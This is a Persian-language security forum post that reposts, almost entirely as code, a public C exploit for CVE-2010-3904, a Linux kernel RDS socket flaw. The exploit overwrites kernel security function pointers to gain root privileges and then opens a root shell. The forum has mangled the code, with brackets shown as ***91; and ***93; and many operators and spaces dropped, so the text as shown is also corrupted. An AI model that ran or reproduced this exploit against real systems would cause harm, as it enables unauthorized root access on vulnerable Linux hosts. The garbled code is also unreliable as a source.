IT Security Team  
قدیمی 10-20-2010, 07:52 PM   #1
عضو فعال
 
hadi85 آواتار ها
 
تاریخ عضویت: Sep 2009
نوشته ها: 160
Thanks: 35
Thanked 150 Times in 75 Posts
پیش فرض Linux RDS Protocol Local Privilege Escalation

کد PHP:
Sourcehttp://www.vsecurity.com/resources/advisory/20101019-1/
 
/*
 * Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit
 * CVE-2010-3904
 * by Dan Rosenberg <[فقط اعضای سایت قادر به دیدن لینکها میباشند ]>
 *
 * Copyright 2010 Virtual Security Research, LLC
 *
 * The handling functions for sending and receiving RDS messages
 * use unchecked __copy_*_user_inatomic functions without any
 * access checks on user-provided pointers.  As a result, by
 * passing a kernel address as an iovec base address in recvmsg-style
 * calls, a local user can overwrite arbitrary kernel memory, which
 * can easily be used to escalate privileges to root.  Alternatively,
 * an arbitrary kernel read can be performed via sendmsg calls.
 *
 * This exploit is simple - it resolves a few kernel symbols,
 * sets the security_ops to the default structure, then overwrites
 * a function pointer (ptrace_traceme) in that structure to point
 * to the payload.  After triggering the payload, the original
 * value is restored.  Hard-coding the offset of this function
 * pointer is a bit inelegant, but I wanted to keep it simple and
 * architecture-independent (i.e. no inline assembly).
 *
 * The vulnerability is yet another example of why you shouldn't
 * allow loading of random packet families unless you actually
 * need them.
 *
 * Greets to spender, kees, taviso, hawkes, team lollerskaters,
 * joberheide, bla, sts, and VSR
 *
 */
 
 
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/utsname.h>
 
#define RECVPORT 5555
#define SENDPORT 6666
 
int prep_sock(int port)
{
     
    
int sret;
    
struct sockaddr_in addr;
 
    
socket(PF_RDSSOCK_SEQPACKET0);
 
    if(
0) {
        
printf("***91;****93; Could not open socket.\n");
        exit(-
1);
    }
     
    
memset(&addr0sizeof(addr));
 
    
addr.sin_addr.s_addr inet_addr("127.0.0.1");
    
addr.sin_family AF_INET;
    
addr.sin_port htons(port);
 
    
ret bind(s, (struct sockaddr *)&addrsizeof(addr));
 
    if(
ret 0) {
        
printf("***91;****93; Could not bind socket.\n");
        exit(-
1);
    }
 
    return 
s;
 
}
 
void get_message(unsigned long addressint sock)
{
 
    
recvfrom(sock, (void *)addresssizeof(void *), 0,
         
NULLNULL);
 
}
 
void send_message(unsigned long valueint sock)
{
     
    
int sizeret;
    
struct sockaddr_in recvaddr;
    
struct msghdr msg;
    
struct iovec iov;
    
unsigned long buf;
     
    
memset(&recvaddr0sizeof(recvaddr));
 
    
size sizeof(recvaddr);
 
    
recvaddr.sin_port htons(RECVPORT);
    
recvaddr.sin_family AF_INET;
    
recvaddr.sin_addr.s_addr inet_addr("127.0.0.1");
 
    
memset(&msg0sizeof(msg));
     
    
msg.msg_name = &recvaddr;
    
msg.msg_namelen sizeof(recvaddr);
    
msg.msg_iovlen 1;
     
    
buf value;
 
    
iov.iov_len sizeof(buf);
    
iov.iov_base = &buf;
 
    
msg.msg_iov = &iov;
 
    
ret sendmsg(sock, &msg0);
    if(
ret 0) {
        
printf("***91;****93; Something went wrong sending.\n");
        exit(-
1);
    }
}
 
void write_to_mem(unsigned long addrunsigned long valueint sendsockint recvsock)
{
 
    if(!
fork()) {
            
sleep(1);
            
send_message(valuesendsock);
            exit(
1);
    }
    else {
        
get_message(addrrecvsock);
        
wait(NULL);
    }
 
}
 
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
 
int __attribute__((regparm(3)))
getroot(void filevoid vma)
{
 
    
commit_creds(prepare_kernel_cred(0));
    return -
1
 
}
 
/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
    
FILE *f;
    
unsigned long addr;
    
char dummy;
    
char sname***91;512***93;;
    
struct utsname ver;
    
int ret;
    
int rep 0;
    
int oldstyle 0;
 
    
fopen("/proc/kallsyms""r");
    if (
== NULL) {
        
fopen("/proc/ksyms""r");
        if (
== NULL)
            goto 
fallback;
        
oldstyle 1;
    }
 
repeat:
    
ret 0;
    while(
ret != EOF) {
        if (!
oldstyle)
            
ret fscanf(f"%p %c %s\n", (void **)&addr, &dummysname);
        else {
            
ret fscanf(f"%p %s\n", (void **)&addrsname);
            if (
ret == 2) {
                
char *p;
                if (
strstr(sname"_O/") || strstr(sname"_S."))
                    continue;
                
strrchr(sname'_');
                if (
> ((char *)sname 5) && !strncmp(3"smp"3)) {
                    
4;
                    while (
> (char *)sname && *(1) == '_')
                        
p--;
                    *
'\0';
                }
            }
        }
        if (
ret == 0) {
            
fscanf(f"%s\n"sname);
            continue;
        }
        if (!
strcmp(namesname)) {
            
fprintf(stdout" ***91;+***93; Resolved %s to %p%s\n"name, (void *)addrrep " (via System.map)" "");
            
fclose(f);
            return 
addr;
        }
    }
 
    
fclose(f);
    if (
rep)
        return 
0;
fallback:
    
/* didn't find the symbol, let's retry with the System.map
       dedicated to the pointlessness of Russell Coker's SELinux
       test machine (why does he keep upgrading the kernel if
       "all necessary security can be provided by SE Linux"?)
    */
    
uname(&ver);
    if (
strncmp(ver.release"2.6"3))
        
oldstyle 1;
    
sprintf(sname"/boot/System.map-%s"ver.release);
    
fopen(sname"r");
    if (
== NULL)
        return 
0;
    
rep 1;
    goto 
repeat;
}
 
int main(int argcchar argv***91;***93;)
{
    
unsigned long sec_opsdef_opscap_ptracetarget;
    
int sendsockrecvsock;
    
struct utsname ver;
 
    
printf("***91;****93; Linux kernel >= 2.6.30 RDS socket exploit\n");
    
printf("***91;****93; by Dan Rosenberg\n");
 
    
uname(&ver);
 
    if(
strncmp(ver.release"2.6.3"5)) {
        
printf("***91;****93; Your kernel is not vulnerable.\n");
        return -
1;
    }  
 
    
/* Resolve addresses of relevant symbols */
    
printf("***91;****93; Resolving kernel addresses...\n");
    
sec_ops get_kernel_sym("security_ops");
    
def_ops get_kernel_sym("default_security_ops");
    
cap_ptrace get_kernel_sym("cap_ptrace_traceme");
    
commit_creds = (_commit_credsget_kernel_sym("commit_creds");
    
prepare_kernel_cred = (_prepare_kernel_credget_kernel_sym("prepare_kernel_cred");
 
    if(!
sec_ops || !def_ops || !cap_ptrace || !commit_creds || !prepare_kernel_cred) {
        
printf("***91;****93; Failed to resolve kernel symbols.\n");
        return -
1;
    }
 
    
/* Calculate target */
    
target def_ops sizeof(void *) + ((11 sizeof(void *)) & ~(sizeof(void *) - 1));
 
    
sendsock prep_sock(SENDPORT);
    
recvsock prep_sock(RECVPORT);
 
    
/* Reset security ops */
    
printf("***91;****93; Overwriting security ops...\n");
    
write_to_mem(sec_opsdef_opssendsockrecvsock);
 
    
/* Overwrite ptrace_traceme security op fptr */
    
printf("***91;****93; Overwriting function pointer...\n");
    
write_to_mem(target, (unsigned long)&getrootsendsockrecvsock);
 
    
/* Trigger the payload */
    
printf("***91;****93; Triggering payload...\n");
    
ptrace(PTRACE_TRACEME1NULLNULL);
     
    
/* Restore the ptrace_traceme security op */
    
printf("***91;****93; Restoring function pointer...\n");
    
write_to_mem(targetcap_ptracesendsockrecvsock);
 
    if(
getuid()) {
        
printf("***91;****93; Exploit failed to get root.\n");
        return -
1;
    }
 
    
printf("***91;****93; Got root!\n");
    
execl("/bin/sh""sh"NULL);
 

hadi85 آنلاین نیست.   پاسخ با نقل قول
پاسخ

برچسب ها
linux, local, privilege

ابزارهای موضوع
نحوه نمایش

مجوز های ارسال و ویرایش
شما نمیتوانید موضوع جدیدی ارسال کنید
شما امکان ارسال پاسخ را ندارید
شما نمیتوانید فایل پیوست در پست خود ضمیمه کنید
شما نمیتوانید پست های خود را ویرایش کنید

BB code هست فعال
شکلک ها فعال است
کد [IMG] فعال است
کد HTML غیر فعال است
Trackbacks are فعال
Pingbacks are فعال
Refbacks are فعال



اکنون ساعت 06:07 AM برپایه ساعت جهانی (GMT - گرینویچ) +4.5 می باشد.


Powered by vBulletin
Copyright ©2000 - 2012, Jelsoft Enterprises Ltd

كليه حقوق اين وب سايت براي ITSecTeam محفوظ ميباشد


Content Relevant URLs by vBSEO ©2011, Crawlability, Inc.